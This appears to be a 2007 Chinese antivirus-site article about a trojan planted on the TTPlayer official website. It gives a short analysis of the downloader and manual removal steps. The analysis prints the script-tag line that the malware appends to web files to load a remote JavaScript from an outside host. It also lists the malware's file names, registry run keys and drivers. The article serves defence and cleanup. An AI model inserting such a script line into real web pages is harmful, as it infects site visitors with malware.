首页 | 最新病毒 | 反病毒学院 | qq病毒专杀 | arp病毒 | MSN病毒 | auto病毒专杀 | U盘病毒 | downloader病毒 | 木马查杀 | 计算机病毒 | 最新漏洞   
您的位置: 首页 >> 木马查杀 >> 阅读资讯:警惕“千千静听”官方网站被挂马(wxptdi.sys,msconkt.sys等木马群的查杀)

警惕“千千静听”官方网站被挂马(wxptdi.sys,msconkt.sys等木马群的查杀)

[ 作者:清新阳光 | 更新日期:2007-12-22 17:54:38 | 阅读次数: ]

警惕“千千静听”官方网站被挂马

wxptdi.sys,msconkt.sys等木马群的查杀

安天:千千静听官方网站挂马事件

下面是该木马下载者的简要分析
File: ntuser.com
Size: 31792 bytes
Modified: 2007年12月22日, 10:19:44
MD5: 5EE5CC57AAD61F73420F874433E526A5
SHA1: 24141C18ACB87CB8E54D924C2E117B8F44926598
CRC32: 605FE6B3

1.病毒运行后,释放如下副本以及文件:
%systemroot%\system32\wxptdi.sys

2.释放一个批处理停止Windows 防火墙服务

3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年

4.启动一个空壳的wuauclt.exe 把%systemroot%\system32\wxptdi.sys(其实和ntuser.com是同一个文件)的代码完全注入进去

5.感染全盘的php jsp asp htm html文件 在后面写入<script language=javascript src=http://cc.18dd.net/1.js></script>的代码

6.wuauclt.exe执行下载木马的操作
读取http://*.com/elf_listo.txt的文件列表
下载27个木马和病毒 到c:\Program Files下面 分别命名为csrss0.exe~csrss9.exe csrssa.exe~csrsst.exe

木马感染后的sreng日志如下:
启动项目
注册表
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<SSLDyn><%systemroot%\SSLDyn.exE> []
    <cmdbcs><%systemroot%\cmdbcs.exe> []
    <WinSysM><%systemroot%\608769M.exe> []
    <WinSysW><%systemroot%\608769L.exe> []
    <Kvsc3><%systemroot%\Kvsc3.exE> []
    <AVPSrv><%systemroot%\AVPSrv.exE> []
    <NVDispDrv><%systemroot%\aorwpw.exe> [N/A]
    <DbgHlp32><%systemroot%\DbgHlp32.exe> []

==================================
驱动程序
[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>(之前的comint32.sys,GD*I32.dll,bj*rl.dll,addr*help.dll木马群变种)
[RAS Asynchronous Media Driver / CCDECODE][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>
[PciHardDisk / PciHardDisk][Stopped/Manual Start]
<\??\%systemroot%\system32\fat32.sys><N/A>(机器狗病毒变种)

==================================
正在运行的进程
[PID: 1740][%systemroot%\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
    [%systemroot%\608769MM.DLL] [N/A, ]
    [%systemroot%\608769WL.DLL] [N/A, ]
    [%systemroot%\system32\SSLDyn.dll] [N/A, ]
    [%systemroot%\system32\cmdbcs.dll] [N/A, ]
    [%systemroot%\system32\Kvsc3.dll] [N/A, ]
    [%systemroot%\system32\AVPSrv.dll] [N/A, ]
    [%systemroot%\system32\DbgHlp32.dll] [N/A, ]
[PID: 524][C:\Program Files\VMware\VMware Tools\VMwareService.exe] [VMware, Inc., 6.0.1 build-55017]
    [%systemroot%\system32\GDQQHXI32.dll] [N/A, ]
    [%systemroot%\system32\GDDTHXI32.dll] [N/A, ]
    [%systemroot%\system32\GDJZI32.dll] [N/A, ]
    [%systemroot%\system32\GDQQSGI32.dll] [N/A, ]
    [%systemroot%\system32\GDZYZJI32.dll] [N/A, ]
    [%systemroot%\system32\GDDJI32.dll] [N/A, ]
    [%systemroot%\system32\GDGFSJI32.dll] [N/A, ]
    [%systemroot%\system32\GDMSI32.dll] [N/A, ]
    [%systemroot%\system32\GDZXI32.dll] [N/A, ]
    [%systemroot%\system32\GDWDI32.dll] [N/A, ]
    [%systemroot%\system32\GDGJI32.dll] [N/A, ]
    [%systemroot%\system32\GDWLI32.dll] [N/A, ]
    [%systemroot%\system32\GDFYI32.dll] [N/A, ]
    [%systemroot%\system32\GDZYHXI32.dll] [N/A, ]
    [%systemroot%\system32\GDHnXaI32.dll] [N/A, ]
    [%systemroot%\system32\GDZHTUI32.dll] [N/A, ]
    [%systemroot%\system32\GDWMI32.dll] [N/A, ]
    [%systemroot%\system32\GDJX2I32.dll] [N/A, ]

清除办法:
下载sreng:http://download.kztechs.com/files/sreng2.zip
Xdelbox:http://www.dodudou.com/down/里面的原创软件文件夹下

1.解压缩Xdelbox
在 添加旁边的框中 输入
%systemroot%\system32\drivers\msconkt.sys
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\DbgHlp32.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\LYLOADER.EXE
%systemroot%\system32\LYMANGR.DLL
%systemroot%\system32\MSDEG32.DLL
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\REGKEY.hiv
%systemroot%\system32\SSLDyn.dll
%systemroot%\system32\wxptdi.sys
%systemroot%\608769L.exe
%systemroot%\608769M.exe
%systemroot%\608769MM.DLL
%systemroot%\608769WL.DLL
%systemroot%\AVPSrv.exE
%systemroot%\cmdbcs.exe
%systemroot%\DbgHlp32.exe
%systemroot%\Kvsc3.exE
%systemroot%\NVDispDRV.EXE
%systemroot%\SSLDyn.exE
%systemroot%\system32\fat32.sys(%systemroot%为环境变量,表示你的系统文件夹安装位置,对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推)
输入完一个以后 点击旁边的添加 按钮 被添加的文件 将出现在下面的大框中
右键 点击右键菜单中的 “立即重启执行删除”
重启计算机以后 会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
系统会自动选择进入第二个系统
类似dos的界面滚动完毕以后 病毒就被删除了
之后会自动重启进入正常模式

2.重启之后
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<SSLDyn><%systemroot%\SSLDyn.exE> []
    <cmdbcs><%systemroot%\cmdbcs.exe> []
    <WinSysM><%systemroot%\608769M.exe> []
    <WinSysW><%systemroot%\608769L.exe> []
    <Kvsc3><%systemroot%\Kvsc3.exE> []
    <AVPSrv><%systemroot%\AVPSrv.exE> []
    <NVDispDrv><%systemroot%\aorwpw.exe> [N/A]
    <DbgHlp32><%systemroot%\DbgHlp32.exe> []


在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>(之前的comint32.sys变种)
[RAS Asynchronous Media Driver / CCDECODE][Running/Auto Start]
<system32\DRIVERS\msconkt.sys><N/A>
[PciHardDisk / PciHardDisk][Stopped/Manual Start]
<\??\%systemroot%\system32\fat32.sys><N/A>(机器狗病毒变种)

3.清除机器狗病毒
参考http://www.newjian.net/zuixinbingdu/2007/1216/1970.html
解决方法第三点即可

4.清除GD*I32.dll,bj*rl.dll,addr*help.dll木马群
参考http://www.newjian.net/mumachasha/2007/1210/1922.html即可

5.修复被感染的网页文件
推荐使用CSI的iframkill
http://www.newjian.net/Anti-virus/anti_virus_2028.html

www.newjian.com


Tags:“千千静听”官方网站 挂马wxptdi.sys msconkt.sys
来源:
上一篇:千千静听官方网站挂马事件  下一篇:205910l.exe,754ec2c6.exe,6400f0e4.dll等木马群手工查杀
您的评论
用户名:新注册) 密码: 匿名评论 [所有评论]

·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为
热点资讯

精彩推荐

最新资讯

随机推荐